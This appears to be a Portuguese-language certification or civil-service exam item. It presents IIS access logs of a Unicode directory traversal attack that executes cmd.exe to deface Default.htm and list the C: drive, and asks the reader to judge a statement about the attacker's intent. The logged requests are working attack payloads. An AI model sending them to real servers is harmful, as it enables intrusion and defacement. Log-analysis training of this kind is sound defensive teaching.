I host.somewhere.org - - [DD/MMM/YYYY:00:24:11 -0200] "GET/IISADMPWD/ ..%c0%af..%c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87

II host.somewhere.org - - [DD/MMM/YYYY:00:24:28 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87

III host.somewhere.org - - [DD/MMM/YYYY:00:25:55 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\
wwwroot\Default.htm HTTP/1.0" 404 461

IV host.somewhere.org - - [DD/MMM/YYYY:00:27:34 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215

V host.somewhere.org - - [DD/MMM/YYYY:00:30:09 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215

VI host.somewhere.org - - [DD/MMM/YYYY:00:30:30 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 502 215

VII host.somewhere.org - - [DD/MMM/YYYY:00:30:51 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880

VIII host.somewhere.org - - [DD/MMM/YYYY:00:34:38 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 200 215

Com relação ao log apresentado acima, na forma dos eventos de I a VIII, julgue o item que se segue.

Nas tentativas exploratórias, referentes aos eventos de I a VI, o atacante procura pelo diretório onde estaria o arquivo com a página inicial.